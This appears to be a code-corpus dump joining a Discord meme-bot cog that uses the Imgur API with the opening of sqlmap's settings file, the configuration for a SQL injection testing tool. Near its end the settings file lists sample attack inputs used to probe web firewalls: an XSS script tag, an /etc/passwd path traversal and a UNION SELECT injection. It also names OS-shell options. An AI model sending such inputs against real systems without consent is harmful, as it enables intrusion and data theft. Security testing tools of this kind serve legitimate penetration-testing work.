self.config = bot.config
self._last_meme = None
if os.path.isfile("memes.json"):
with open("memes.json") as meme_file:
self.memes = json.load(meme_file)
else:
self.memes = list()
def save_memes(self):
for meme in self.memes:
random.shuffle(meme['tags'])
with open("memes.json", "w") as file_out:
json.dump(self.memes, file_out)
def normalize(self, string: str):
return string.replace("'", "").replace("fuck", "fck").lower().strip()
def find_best_meme(self, search_for, use_instants=True):
memes = []
before_tags = self.normalize(search_for).split()
search_tags = set()
for meme in self.memes:
assert isinstance(meme, dict)
for b_tag in before_tags:
for m_tag in meme['tags'] + meme.get('instants', list()):
if b_tag in m_tag:
search_tags.add(b_tag)
break
if not search_tags:
return []
if len(search_tags) > 1:
use_instants = False
self.bot.logger.trace(
'find_best_meme with search_for="{}" before_tags=[{}] search_tags=set({}) use_instants={}'.format(
search_for, ", ".join(before_tags), ", ".join(search_tags), use_instants))
for meme in self.memes:
assert isinstance(meme, dict)
will_add = True
for s_tag in search_tags:
is_in = False
if use_instants:
for instant in meme.get('instants', list()):
if s_tag == instant:
return [meme]
for m_tag in meme['tags']:
if s_tag in m_tag:
is_in = True
if not is_in:
will_add = False
if will_add:
memes.append(meme)
if len(memes) == 1:
self._last_meme = memes[0]
return memes
def has_instants(self, search_for):
search_tags = search_for.split()
for meme in self.memes:
assert isinstance(meme, dict)
for instant in meme.get('instants', list()):
for stag in search_tags:
if stag in instant:
return True
return False
async def ask(self, question: str):
to_del = await self.bot.say(self.bot.msg_prefix + question)
await asyncio.sleep(0.5)
response = await self.bot.wait_for_message(author=self.bot.user)
string = response.content
await self.bot.delete_message(to_del)
await self.bot.delete_message(response)
return string
@commands.command(pass_context=True, aliases=["addmeme", "snagmeme"])
async def savememe(self, ctx, url: str = ""):
"""
Saves the uploaded image
"""
if len(ctx.message.attachments) > 0 or url:
if len(ctx.message.attachments) > 0:
url = ctx.message.attachments[0]['url']
async with aiohttp.ClientSession() as session:
async with session.post(self.IMGUR_API_LINK,
data={'image': url, 'type': "URL"},
headers={"Authorization": "Client-ID {}".format(
self.config['imgur_client_id'])}) as response:
response_json = json.loads(await response.text())
response_tags = await self.ask("Please give tags")
if len(response_tags) > 0:
tags = self.normalize(response_tags).split()
else:
await self.bot.say(self.bot.msg_prefix + "No tags given... Aborting...")
return
info = {'tags': tags,
'delete_hash': response_json['data']['deletehash'],
'width': response_json['data']['width'],
'height': response_json['data']['height'],
'id': response_json['data']['id'],
'link': response_json['data']['link']}
self.memes.append(info)
self.save_memes()
self._last_meme = info
to_del = await self.bot.say(self.bot.msg_prefix + "\U0001f44d")
await asyncio.sleep(5)
await self.bot.delete_message(to_del)
await self.bot.delete_message(ctx.message)
else:
self.bot.say(self.bot.msg_prefix + "You didn't include an image...")
@commands.command(pass_context=True)
async def removememe(self, ctx, *, search_for: str):
"""
Will remove all memes it finds
"""
memes = self.find_best_meme(search_for)
if memes:
for meme in memes:
self.memes.remove(meme)
async with aiohttp.ClientSession() as session:
async with session.delete(self.IMGUR_API_LINK + "/{}".format(meme['delete_hash']),
headers={"Authorization": "Client-ID {}".format(
self.config['imgur_client_id'])}) as response:
response_json = json.loads(await response.text())
if response_json['success']:
await self.bot.say(self.bot.msg_prefix + "Successfully deleted")
else:
await self.bot.say(
self.bot.msg_prefix + "Local pointer deleted, imgur refused to delete...")
self.save_memes()
else:
await self.bot.say(self.bot.msg_prefix + "Didn't find such meme")
@commands.command(pass_context=True)
async def meme(self, ctx, *, search_for: str):
"""
meme response
"""
memes = self.find_best_meme(search_for)
if memes:
index = random.randint(0, len(memes) - 1)
if ctx.message.author.permissions_in(ctx.message.channel).embed_links:
em = discord.Embed()
em.set_image(url=memes[index]['link'])
await self.bot.send_message(ctx.message.channel, embed=em)
else:
await self.bot.say(self.bot.msg_prefix + memes[index]['link'])
await asyncio.sleep(5)
await self.bot.delete_message(ctx.message)
self.memes[index]['usage'] = self.memes[index].setdefault('usage', 0) + 1
self._last_meme = memes[index]
else:
await self.bot.say(self.bot.msg_prefix + "Unable to find meme")
@commands.command(pass_context=True, aliases=["addinstantmeme"])
async def makeinstantmeme(self, ctx):
"""
Will make instant access string for meme
"""
string = await self.ask("What to search for?")
if not string:
await self.bot.say(self.bot.msg_prefix + "Please specify string... Aborting...")
return
memes = self.find_best_meme(string)
if len(memes) > 10:
await self.bot.say(self.bot.msg_prefix + "That returned too many memes... Aborting...")
return
index = 0
if len(memes) > 1:
mmm = "\n"
counter = 0
for meme in memes:
mmm += "{}: {}\n".format(counter, meme['tags'])
string = await self.ask("Choose what meme" + mmm)
try:
index = int(string)
except:
await self.bot.say(self.bot.msg_prefix + "Unable to convert to int... Aborting...")
return
assert isinstance(self.memes, list)
try:
meme_index = self.memes.index(memes[index])
meme = self.memes[meme_index]
except ValueError:
await self.bot.say(self.bot.msg_prefix + "Meme found was not in memes???")
return
string = await self.ask("What will be used for instant access?")
for s in string.split():
if self.has_instants(s):
await self.bot.say(self.bot.msg_prefix + "Instant ``{}`` already in use.".format(s))
else:
meme.setdefault('instants', list()).append(s)
self.memes[meme_index] = meme
self.save_memes()
await self.bot.say(self.bot.msg_prefix + "Added instants")
@commands.command(pass_context=True)
async def removeinstantmeme(self, ctx, search_for: str):
"""
Removes instant access from meme
"""
for meme in self.memes[:]:
assert isinstance(meme, dict)
if search_for in meme.get('instants',list()):
assert isinstance(meme['instants'], list)
index = self.memes.index(meme)
try:
meme['instants'].remove(search_for)
self.memes[index] = meme
await self.bot.say(self.bot.msg_prefix + "Removed instant meme")
return
except ValueError:
pass
await self.bot.say(self.bot.msg_prefix + "Didn't find such meme")
@commands.command(pass_context=True, aliases=['findmemes', 'findmeme', 'listmeme'])
async def listmemes(self, ctx, *, search_for: str = ""):
"""
Lists memes
"""
self.save_memes()
if search_for:
memes = self.find_best_meme(search_for, False)
else:
memes = self.memes
if not memes:
await self.bot.say(self.bot.msg_prefix + "Unable to find anything")
return
mmm = self.bot.msg_prefix
counter = 1
for meme in memes:
assert isinstance(meme, dict)
if meme.get('instants', []):
next_m = "``{} (instants: {}): {}``, ".format(counter, ", ".join(meme['instants']),
" ".join(meme['tags']))
else:
next_m = "``{}: {}``, ".format(counter, " ".join(meme['tags']))
counter += 1
if len(next_m + mmm) < 2000:
mmm += next_m
else:
await self.bot.say(mmm[:-2])
mmm = self.bot.msg_prefix + next_m
await self.bot.say(mmm[:-2])
@commands.command(pass_context=True)
async def cleanmemes(self, ctx):
"""
Cleans memes
"""
tag_changes = []
for meme in self.memes:
assert isinstance(meme, dict)
final_tags = [self.normalize(i) for i in meme['tags']]
for tag1 in final_tags[:]:
one_skip = True
for tag2 in final_tags[:]:
if tag1 == tag2:
if one_skip:
one_skip = False
continue
if tag1 in tag2:
final_tags.remove(tag1)
break
index = self.memes.index(meme)
if len(final_tags) != len(meme['tags']):
tag_changes.append("``{} -> {}``".format(" ".join(meme['tags']), " ".join(final_tags)))
self.memes[index]['tags'] = final_tags
if tag_changes:
self.save_memes()
mmm = self.bot.msg_prefix + "Here are the memes I changed:\n"
for change in tag_changes:
next_m = change + ", "
if len(mmm + next_m) < 2000:
mmm += next_m
else:
await self.bot.say(mmm[:-2])
mmm = self.bot.msg_prefix + next_m
await self.bot.say(mmm[:-2])
else:
await self.bot.say(self.bot.msg_prefix + "All memes are already clean")
@commands.command(pass_context=True, aliases=['listintants'])
async def listinstantmemes(self, ctx):
"""
Lists all memes that have some instants
"""
ll = list()
for meme in self.memes:
assert isinstance(meme, dict)
if meme.get('instants', list()):
ll.append("``{} -> {}``".format(", ".join(meme['instants']), " ".join(meme['tags'])))
if ll:
mmm = self.bot.msg_prefix
for l in ll:
next_m = l + ", "
if len(mmm + next_m) < 2000:
mmm += next_m
else:
await self.bot.say(mmm[:-2])
mmm = self.bot.msg_prefix + next_m
await self.bot.say(mmm[:-2])
@commands.group(pass_context=True)
async def lastmeme(self, ctx):
"""
Does stuff to last meme
"""
if ctx.invoked_subcommand is None: # TIL I could just use `invoke_without_command=True` in deco
if not self._last_meme:
await self.bot.say(self.bot.msg_prefix + "You haven't used meme since last restart.")
return
await self.bot.say(self.bot.msg_prefix + "Last meme is: ``{}``".format(" ".join(self._last_meme['tags'])))
@lastmeme.command(pass_context=True, aliases=['show','view'])
async def display(self, ctx):
"""
Displays the meme
"""
if ctx.message.author.permissions_in(ctx.message.channel).embed_links:
em = discord.Embed()
em.set_image(url=self._last_meme['link'])
await self.bot.send_message(ctx.message.channel, embed=em)
else:
await self.bot.say(self.bot.msg_prefix + self._last_meme['link'])
await asyncio.sleep(5)
await self.bot.delete_message(ctx.message)
@lastmeme.command(pass_context=True, aliases=['switch'])
async def change(self, ctx, url: str = ""):
"""
Changes the last meme to the uploaded image
"""
tags = self._last_meme['tags']
if not (len(ctx.message.attachments) > 0 or url):
self.bot.say(self.bot.msg_prefix + "You didn't include an image...")
return
await self.bot.say(self.bot.msg_prefix + "Deleting then uploading new one")
self.memes.remove(self._last_meme)
async with aiohttp.ClientSession() as session:
async with session.delete(self.IMGUR_API_LINK + "/{}".format(self._last_meme['delete_hash']),
headers={"Authorization": "Client-ID {}".format(
self.config['imgur_client_id'])}) as response:
response_json = json.loads(await response.text())
if response_json['success']:
await self.bot.say(self.bot.msg_prefix + "Successfully deleted")
else:
await self.bot.say(
self.bot.msg_prefix + "Local pointer deleted, imgur refused to delete...")
if len(ctx.message.attachments) > 0:
url = ctx.message.attachments[0]['url']
async with aiohttp.ClientSession() as session:
async with session.post(self.IMGUR_API_LINK,
data={'image': url, 'type': "URL"},
headers={"Authorization": "Client-ID {}".format(
self.config['imgur_client_id'])}) as response:
response_json = json.loads(await response.text())
info = {'tags': tags,
'delete_hash': response_json['data']['deletehash'],
'width': response_json['data']['width'],
'height': response_json['data']['height'],
'id': response_json['data']['id'],
'link': response_json['data']['link']}
self.memes.append(info)
self.save_memes()
self._last_meme = info
to_del = await self.bot.say(self.bot.msg_prefix + "\U0001f44d")
await asyncio.sleep(5)
await self.bot.delete_message(to_del)
await self.bot.delete_message(ctx.message)
@lastmeme.command(pass_context=True, aliases=['addtags'])
async def addtag(self, ctx, *, tags: str):
"""
Adds tag to last meme
"""
if not self._last_meme:
await self.bot.say(self.bot.msg_prefix + "You haven't used meme since last restart.")
return
index = self.memes.index(self._last_meme)
for tag in tags.split():
self._last_meme['tags'].append(tag)
self.memes[index] = self._last_meme
self.save_memes()
await self.bot.say(self.bot.msg_prefix + "Added")
@lastmeme.command(pass_context=True, aliases=['removetags'])
async def removetag(self, ctx, *, tags: str):
"""
Removes tag from last meme
"""
if not self._last_meme:
await self.bot.say(self.bot.msg_prefix + "You haven't used meme since last restart.")
return
index = self.memes.index(self._last_meme)
for s_tag in tags.split():
for m_tag in self._last_meme['tags'][:]:
if m_tag in s_tag:
try:
self._last_meme['tags'].remove(m_tag)
except ValueError:
pass
self.memes[index] = self._last_meme
self.save_memes()
await self.bot.say(self.bot.msg_prefix + "Removed")
@lastmeme.command(pass_context=True)
async def addinstant(self, ctx, instant: str):
"""
Adds instant access to last meme
"""
index = self.memes.index(self._last_meme)
for s in instant.split():
if self.has_instants(s):
await self.bot.say(self.bot.msg_prefix + "Instant ``{}`` already in use.".format(s))
else:
self._last_meme.setdefault('instants', list()).append(s)
await self.bot.say(self.bot.msg_prefix + "Added")
self.memes[index] = self._last_meme
self.save_memes()
@lastmeme.command(pass_context=True, aliases=["delete"])
async def remove(self, ctx):
"""
Removes the lastmeme
"""
meme = self._last_meme
self.memes.remove(meme)
async with aiohttp.ClientSession() as session:
async with session.delete(self.IMGUR_API_LINK + "/{}".format(meme['delete_hash']),
headers={"Authorization": "Client-ID {}".format(
self.config['imgur_client_id'])}) as response:
response_json = json.loads(await response.text())
if response_json['success']:
await self.bot.say(self.bot.msg_prefix + "Successfully deleted")
else:
await self.bot.say(self.bot.msg_prefix + "Local pointer deleted, imgur refused to delete...")
self.save_memes()
def setup(bot: commands.Bot):
bot.add_cog(Memes(bot))
| mit |
golismero/golismero-devel | tools/sqlmap/lib/core/settings.py | 7 | 25124 | #!/usr/bin/env python
"""
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
import os
import re
import subprocess
import string
import sys
from lib.core.enums import DBMS
from lib.core.enums import DBMS_DIRECTORY_NAME
from lib.core.enums import OS
from lib.core.revision import getRevisionNumber
# sqlmap version and site
VERSION = "1.0-dev"
REVISION = getRevisionNumber()
VERSION_STRING = "sqlmap/%s%s" % (VERSION, "-%s" % REVISION if REVISION else "")
DESCRIPTION = "automatic SQL injection and database takeover tool"
SITE = "http://sqlmap.org"
ISSUES_PAGE = "https://github.com/sqlmapproject/sqlmap/issues/new"
GIT_REPOSITORY = "git://github.com/sqlmapproject/sqlmap.git"
ML = "sqlmap-users@lists.sourceforge.net"
# Minimum distance of ratio from kb.matchRatio to result in True
DIFF_TOLERANCE = 0.05
CONSTANT_RATIO = 0.9
# Lower and upper values for match ratio in case of stable page
LOWER_RATIO_BOUND = 0.02
UPPER_RATIO_BOUND = 0.98
# Markers for special cases when parameter values contain html encoded characters
PARAMETER_AMP_MARKER = "__AMP__"
PARAMETER_SEMICOLON_MARKER = "__SEMICOLON__"
PARTIAL_VALUE_MARKER = "__PARTIAL_VALUE__"
PARTIAL_HEX_VALUE_MARKER = "__PARTIAL_HEX_VALUE__"
URI_QUESTION_MARKER = "__QUESTION_MARK__"
ASTERISK_MARKER = "__ASTERISK_MARK__"
REPLACEMENT_MARKER = "__REPLACEMENT_MARK__"
PAYLOAD_DELIMITER = "__PAYLOAD_DELIMITER__"
CHAR_INFERENCE_MARK = "%c"
PRINTABLE_CHAR_REGEX = r"[^\x00-\x1f\x7f-\xff]"
# Regular expression used for recognition of generic permission messages
PERMISSION_DENIED_REGEX = r"(command|permission|access)\s*(was|is)?\s*denied"
# Regular expression used for recognition of generic maximum connection messages
MAX_CONNECTIONS_REGEX = r"max.+connections"
# Regular expression used for extracting results from google search
GOOGLE_REGEX = r"url\?\w+=((?![^>]+webcache\.googleusercontent\.com)http[^>]+)&(sa=U|rct=j)"
# Regular expression used for extracting content from "textual" tags
TEXT_TAG_REGEX = r"(?si)<(abbr|acronym|b|blockquote|br|center|cite|code|dt|em|font|h\d|i|li|p|pre|q|strong|sub|sup|td|th|title|tt|u)(?!\w).*?>(?P<result>[^<]+)"
# Regular expression used for recognition of IP addresses
IP_ADDRESS_REGEX = r"\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b"
# Dumping characters used in GROUP_CONCAT MySQL technique
CONCAT_ROW_DELIMITER = ','
CONCAT_VALUE_DELIMITER = '|'
# Coefficient used for a time-based query delay checking (must be >= 7)
TIME_STDEV_COEFF = 7
# Minimum response time that can be even considered as delayed (not a complete requirement)
MIN_VALID_DELAYED_RESPONSE = 0.5
# Standard deviation after which a warning message should be displayed about connection lags
WARN_TIME_STDEV = 0.5
# Minimum length of usable union injected response (quick defense against substr fields)
UNION_MIN_RESPONSE_CHARS = 10
# Coefficient used for a union-based number of columns checking (must be >= 7)
UNION_STDEV_COEFF = 7
# Length of queue for candidates for time delay adjustment
TIME_DELAY_CANDIDATES = 3
# Default value for HTTP Accept header
HTTP_ACCEPT_HEADER_VALUE = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
# Default value for HTTP Accept-Encoding header
HTTP_ACCEPT_ENCODING_HEADER_VALUE = "gzip,deflate"
# Default timeout for running commands over backdoor
BACKDOOR_RUN_CMD_TIMEOUT = 5
# Maximum number of techniques used in inject.py/getValue() per one value
MAX_TECHNIQUES_PER_VALUE = 2
# Suffix used for naming meta databases in DBMS(es) without explicit database name
METADB_SUFFIX = "_masterdb"
# Minimum time response set needed for time-comparison based on standard deviation
MIN_TIME_RESPONSES = 15
# Minimum comparison ratio set needed for searching valid union column number based on standard deviation
MIN_UNION_RESPONSES = 5
# After these number of blanks at the end inference should stop (just in case)
INFERENCE_BLANK_BREAK = 10
# Use this replacement character for cases when inference is not able to retrieve the proper character value
INFERENCE_UNKNOWN_CHAR = '?'
# Character used for operation "greater" in inference
INFERENCE_GREATER_CHAR = ">"
# Character used for operation "equals" in inference
INFERENCE_EQUALS_CHAR = "="
# Character used for operation "not-equals" in inference
INFERENCE_NOT_EQUALS_CHAR = "!="
# String used for representation of unknown dbms
UNKNOWN_DBMS = "Unknown"
# String used for representation of unknown dbms version
UNKNOWN_DBMS_VERSION = "Unknown"
# Dynamicity mark length used in dynamicity removal engine
DYNAMICITY_MARK_LENGTH = 32
# Dummy user prefix used in dictionary attack
DUMMY_USER_PREFIX = "__dummy__"
# Reference: http://en.wikipedia.org/wiki/ISO/IEC_8859-1
DEFAULT_PAGE_ENCODING = "iso-8859-1"
# URL used in dummy runs
DUMMY_URL = "http://foo/bar?id=1"
# System variables
IS_WIN = subprocess.mswindows
# The name of the operating system dependent module imported. The following names have currently been registered: 'posix', 'nt', 'mac', 'os2', 'ce', 'java', 'riscos'
PLATFORM = os.name
PYVERSION = sys.version.split()[0]
# DBMS system databases
MSSQL_SYSTEM_DBS = ("Northwind", "master", "model", "msdb", "pubs", "tempdb")
MYSQL_SYSTEM_DBS = ("information_schema", "mysql") # Before MySQL 5.0 only "mysql"
PGSQL_SYSTEM_DBS = ("information_schema", "pg_catalog", "pg_toast")
ORACLE_SYSTEM_DBS = ("CTXSYS", "DBSNMP", "DMSYS", "EXFSYS", "MDSYS", "OLAPSYS", "ORDSYS", "OUTLN", "SYS", "SYSAUX", "SYSMAN", "SYSTEM", "TSMSYS", "WMSYS", "XDB") # These are TABLESPACE_NAME
SQLITE_SYSTEM_DBS = ("sqlite_master", "sqlite_temp_master")
ACCESS_SYSTEM_DBS = ("MSysAccessObjects", "MSysACEs", "MSysObjects", "MSysQueries", "MSysRelationships", "MSysAccessStorage",\
"MSysAccessXML", "MSysModules", "MSysModules2")
FIREBIRD_SYSTEM_DBS = ("RDB$BACKUP_HISTORY", "RDB$CHARACTER_SETS", "RDB$CHECK_CONSTRAINTS", "RDB$COLLATIONS", "RDB$DATABASE",\
"RDB$DEPENDENCIES", "RDB$EXCEPTIONS", "RDB$FIELDS", "RDB$FIELD_DIMENSIONS", " RDB$FILES", "RDB$FILTERS",\
"RDB$FORMATS", "RDB$FUNCTIONS", "RDB$FUNCTION_ARGUMENTS", "RDB$GENERATORS", "RDB$INDEX_SEGMENTS", "RDB$INDICES",\
"RDB$LOG_FILES", "RDB$PAGES", "RDB$PROCEDURES", "RDB$PROCEDURE_PARAMETERS", "RDB$REF_CONSTRAINTS", "RDB$RELATIONS",\
"RDB$RELATION_CONSTRAINTS", "RDB$RELATION_FIELDS", "RDB$ROLES", "RDB$SECURITY_CLASSES", "RDB$TRANSACTIONS", "RDB$TRIGGERS",\
"RDB$TRIGGER_MESSAGES", "RDB$TYPES", "RDB$USER_PRIVILEGES", "RDB$VIEW_RELATIONS")
MAXDB_SYSTEM_DBS = ("SYSINFO", "DOMAIN")
SYBASE_SYSTEM_DBS = ("master", "model", "sybsystemdb", "sybsystemprocs")
DB2_SYSTEM_DBS = ("NULLID", "SQLJ", "SYSCAT", "SYSFUN", "SYSIBM", "SYSIBMADM", "SYSIBMINTERNAL", "SYSIBMTS",\
"SYSPROC", "SYSPUBLIC", "SYSSTAT", "SYSTOOLS")
HSQLDB_SYSTEM_DBS = ("INFORMATION_SCHEMA", "SYSTEM_LOB")
MSSQL_ALIASES = ("microsoft sql server", "mssqlserver", "mssql", "ms")
MYSQL_ALIASES = ("mysql", "my")
PGSQL_ALIASES = ("postgresql", "postgres", "pgsql", "psql", "pg")
ORACLE_ALIASES = ("oracle", "orcl", "ora", "or")
SQLITE_ALIASES = ("sqlite", "sqlite3")
ACCESS_ALIASES = ("msaccess", "access", "jet", "microsoft access")
FIREBIRD_ALIASES = ("firebird", "mozilla firebird", "interbase", "ibase", "fb")
MAXDB_ALIASES = ("maxdb", "sap maxdb", "sap db")
SYBASE_ALIASES = ("sybase", "sybase sql server")
DB2_ALIASES = ("db2", "ibm db2", "ibmdb2")
HSQLDB_ALIASES = ("hsql", "hsqldb", "hs", "hypersql")
DBMS_DIRECTORY_DICT = dict((getattr(DBMS, _), getattr(DBMS_DIRECTORY_NAME, _)) for _ in dir(DBMS) if not _.startswith("_"))
SUPPORTED_DBMS = MSSQL_ALIASES + MYSQL_ALIASES + PGSQL_ALIASES + ORACLE_ALIASES + SQLITE_ALIASES + ACCESS_ALIASES + FIREBIRD_ALIASES + MAXDB_ALIASES + SYBASE_ALIASES + DB2_ALIASES + HSQLDB_ALIASES
SUPPORTED_OS = ("linux", "windows")
USER_AGENT_ALIASES = ("ua", "useragent", "user-agent")
REFERER_ALIASES = ("ref", "referer", "referrer")
HOST_ALIASES = ("host",)
# Items displayed in basic help (-h) output
BASIC_HELP_ITEMS = (
"url",
"googleDork",
"data",
"cookie",
"randomAgent",
"proxy",
"testParameter",
"dbms",
"level",
"risk",
"tech",
"getAll",
"getBanner",
"getCurrentUser",
"getCurrentDb",
"getPasswordHashes",
"getTables",
"getColumns",
"getSchema",
"dumpTable",
"dumpAll",
"db",
"tbl",
"col",
"osShell",
"osPwn",
"batch",
"checkTor",
"flushSession",
"tor",
"wizard",
)
# String representation for NULL value
NULL = "NULL"
# String representation for blank ('') value
BLANK = "<blank>"
# String representation for current database
CURRENT_DB = "CD"
# Regular expressions used for parsing error messages (--parse-errors)
ERROR_PARSING_REGEXES = (
r"<b>[^<]*(fatal|error|warning|exception)[^<]*</b>:?\s*(?P<result>.+?)<br\s*/?\s*>",
r"(?m)^(fatal|error|warning|exception):?\s*(?P<result>.+?)$",
r"<li>Error Type:<br>(?P<result>.+?)</li>",
r"error '[0-9a-f]{8}'((<[^>]+>)|\s)+(?P<result>[^<>]+)",
)
# Regular expression used for parsing charset info from meta html headers
META_CHARSET_REGEX = r'(?si)<head>.*<meta http-equiv="?content-type"?[^>]+charset=(?P<result>[^">]+).*</head>'
# Regular expression used for parsing refresh info from meta html headers
META_REFRESH_REGEX = r'(?si)<head>.*<meta http-equiv="?refresh"?[^>]+content="?[^">]+url=(?P<result>[^">]+).*</head>'
# Regular expression used for parsing empty fields in tested form data
EMPTY_FORM_FIELDS_REGEX = r'(&|\A)(?P<result>[^=]+=(&|\Z))'
# Reference: http://www.cs.ru.nl/bachelorscripties/2010/Martin_Devillers___0437999___Analyzing_password_strength.pdf
COMMON_PASSWORD_SUFFIXES = ("1", "123", "2", "12", "3", "13", "7", "11", "5", "22", "23", "01", "4", "07", "21", "14", "10", "06", "08", "8", "15", "69", "16", "6", "18")
# Reference: http://www.the-interweb.com/serendipity/index.php?/archives/94-A-brief-analysis-of-40,000-leaked-MySpace-passwords.html
COMMON_PASSWORD_SUFFIXES += ("!", ".", "*", "!!", "?", ";", "..", "!!!", ", ", "@")
# Splitter used between requests in WebScarab log files
WEBSCARAB_SPLITTER = "### Conversation"
# Splitter used between requests in BURP log files
BURP_REQUEST_REGEX = r"={10,}\s+[^=]+={10,}\s(.+?)\s={10,}"
# Regex used for parsing XML Burp saved history items
BURP_XML_HISTORY_REGEX = r'<request base64="true"><!\[CDATA\[([^]]+)'
# Encoding used for Unicode data
UNICODE_ENCODING = "utf8"
# Reference: http://www.w3.org/Protocols/HTTP/Object_Headers.html#uri
URI_HTTP_HEADER = "URI"
# Uri format which could be injectable (e.g. www.site.com/id82)
URI_INJECTABLE_REGEX = r"//[^/]*/([^\.*?]+)\Z"
# Regex used for masking sensitive data
SENSITIVE_DATA_REGEX = "(\s|=)(?P<result>[^\s=]*%s[^\s]*)\s"
# Maximum number of threads (avoiding connection issues and/or DoS)
MAX_NUMBER_OF_THREADS = 10
# Minimum range between minimum and maximum of statistical set
MIN_STATISTICAL_RANGE = 0.01
# Minimum value for comparison ratio
MIN_RATIO = 0.0
# Maximum value for comparison ratio
MAX_RATIO = 1.0
# Character used for marking injectable position inside provided data
CUSTOM_INJECTION_MARK_CHAR = '*'
# Other way to declare injection position
INJECT_HERE_MARK = '%INJECT HERE%'
# Maximum length used for retrieving data over MySQL error based payload due to "known" problems with longer result strings
MYSQL_ERROR_CHUNK_LENGTH = 50
# Maximum length used for retrieving data over MSSQL error based payload due to trimming problems with longer result strings
MSSQL_ERROR_CHUNK_LENGTH = 100
# Do not escape the injected statement if it contains any of the following SQL keywords
EXCLUDE_UNESCAPE = ("WAITFOR DELAY ", " INTO DUMPFILE ", " INTO OUTFILE ", "CREATE ", "BULK ", "EXEC ", "RECONFIGURE ", "DECLARE ", "'%s'" % CHAR_INFERENCE_MARK)
# Mark used for replacement of reflected values
REFLECTED_VALUE_MARKER = "__REFLECTED_VALUE__"
# Regular expression used for replacing border non-alphanum characters
REFLECTED_BORDER_REGEX = r"[^A-Za-z]+"
# Regular expression used for replacing non-alphanum characters
REFLECTED_REPLACEMENT_REGEX = r".+?"
# Maximum number of alpha-numerical parts in reflected regex (for speed purposes)
REFLECTED_MAX_REGEX_PARTS = 10
# Chars which can be used as a failsafe values in case of too long URL encoding value
URLENCODE_FAILSAFE_CHARS = "()|,"
# Maximum length of URL encoded value after which failsafe procedure takes away
URLENCODE_CHAR_LIMIT = 2000
# Default schema for Microsoft SQL Server DBMS
DEFAULT_MSSQL_SCHEMA = "dbo"
# Display hash attack info every mod number of items
HASH_MOD_ITEM_DISPLAY = 11
# Maximum integer value
MAX_INT = sys.maxint
# Options that need to be restored in multiple targets run mode
RESTORE_MERGED_OPTIONS = ("col", "db", "dnsName", "privEsc", "tbl", "regexp", "string", "textOnly", "threads", "timeSec", "tmpPath", "uChar", "user")
# Parameters to be ignored in detection phase (upper case)
IGNORE_PARAMETERS = ("__VIEWSTATE", "__VIEWSTATEENCRYPTED", "__EVENTARGUMENT", "__EVENTTARGET", "__EVENTVALIDATION", "ASPSESSIONID", "ASP.NET_SESSIONID", "JSESSIONID", "CFID", "CFTOKEN")
# Regular expression used for recognition of ASP.NET control parameters
ASP_NET_CONTROL_REGEX = r"(?i)\Actl\d+\$"
# Turn off resume console info to avoid potential slowdowns
TURN_OFF_RESUME_INFO_LIMIT = 20
# Strftime format for results file used in multiple target mode
RESULTS_FILE_FORMAT = "results-%m%d%Y_%I%M%p.csv"
# Official web page with the list of Python supported codecs
CODECS_LIST_PAGE = "http://docs.python.org/library/codecs.html#standard-encodings"
# Simple regular expression used to distinguish scalar from multiple-row commands (not sole condition)
SQL_SCALAR_REGEX = r"\A(SELECT(?!\s+DISTINCT\(?))?\s*\w*\("
# IP address of the localhost
LOCALHOST = "127.0.0.1"
# Default port used by Tor
DEFAULT_TOR_SOCKS_PORT = 9050
# Default ports used in Tor proxy bundles
DEFAULT_TOR_HTTP_PORTS = (8123, 8118)
# Percentage below which comparison engine could have problems
LOW_TEXT_PERCENT = 20
# These MySQL keywords can't go (alone) into versioned comment form (/*!...*/)
# Reference: http://dev.mysql.com/doc/refman/5.1/en/function-resolution.html
IGNORE_SPACE_AFFECTED_KEYWORDS = ("CAST", "COUNT", "EXTRACT", "GROUP_CONCAT", "MAX", "MID", "MIN", "SESSION_USER", "SUBSTR", "SUBSTRING", "SUM", "SYSTEM_USER", "TRIM")
LEGAL_DISCLAIMER = "Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program"
# After this number of misses reflective removal mechanism is turned off (for speed up reasons)
REFLECTIVE_MISS_THRESHOLD = 20
# Regular expression used for extracting HTML title
HTML_TITLE_REGEX = "<title>(?P<result>[^<]+)</title>"
# Table used for Base64 conversion in WordPress hash cracking routine
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
# Chars used to quickly distinguish if the user provided tainted parameter values
DUMMY_SQL_INJECTION_CHARS = ";()'"
# Simple check against dummy users
DUMMY_USER_INJECTION = r"(?i)[^\w](AND|OR)\s+[^\s]+[=><]|\bUNION\b.+\bSELECT\b"
# Extensions skipped by crawler
CRAWL_EXCLUDE_EXTENSIONS = ("gif", "jpg", "jpeg", "image", "jar", "tif", "bmp", "war", "ear", "mpg", "mpeg", "wmv", "mpeg", "scm", "iso", "dmp", "dll", "cab", "so", "avi", "mkv", "bin", "iso", "tar", "png", "pdf", "ps", "wav", "mp3", "mp4", "au", "aiff", "aac", "zip", "rar", "7z", "gz", "flv", "mov")
# Patterns often seen in HTTP headers containing custom injection marking character
PROBLEMATIC_CUSTOM_INJECTION_PATTERNS = r"(\bq=[^;']+)|(\*/\*)"
# Template used for common table existence check
BRUTE_TABLE_EXISTS_TEMPLATE = "EXISTS(SELECT %d FROM %s)"
# Template used for common column existence check
BRUTE_COLUMN_EXISTS_TEMPLATE = "EXISTS(SELECT %s FROM %s)"
# Payload used for checking of existence of IDS/WAF (dummier the better)
IDS_WAF_CHECK_PAYLOAD = "AND 1=1 UNION ALL SELECT 1,2,3,table_name FROM information_schema.tables WHERE 2>1"
# Vectors used for provoking specific WAF/IDS/IPS behavior(s)
WAF_ATTACK_VECTORS = (
"", # NIL
"search=<script>alert(1)</script>",
"file=../../../../etc/passwd",
"q=<invalid>foobar",
"id=1 %s" % IDS_WAF_CHECK_PAYLOAD
)
# Used for status representation in dictionary attack phase
ROTATING_CHARS = ('\\', '|', '|', '/', '-')
# Chunk length (in items) used by BigArray objects (only last chunk and cached one are held in memory)
BIGARRAY_CHUNK_LENGTH = 4096
# Only console display last n table rows
TRIM_STDOUT_DUMP_SIZE = 256
# Parse response headers only first couple of times
PARSE_HEADERS_LIMIT = 3
# Step used in ORDER BY technique used for finding the right number of columns in UNION query injections
ORDER_BY_STEP = 10
# Maximum number of times for revalidation of a character in time-based injections
MAX_TIME_REVALIDATION_STEPS = 5
# Characters that can be used to split parameter values in provided command line (e.g. in --tamper)
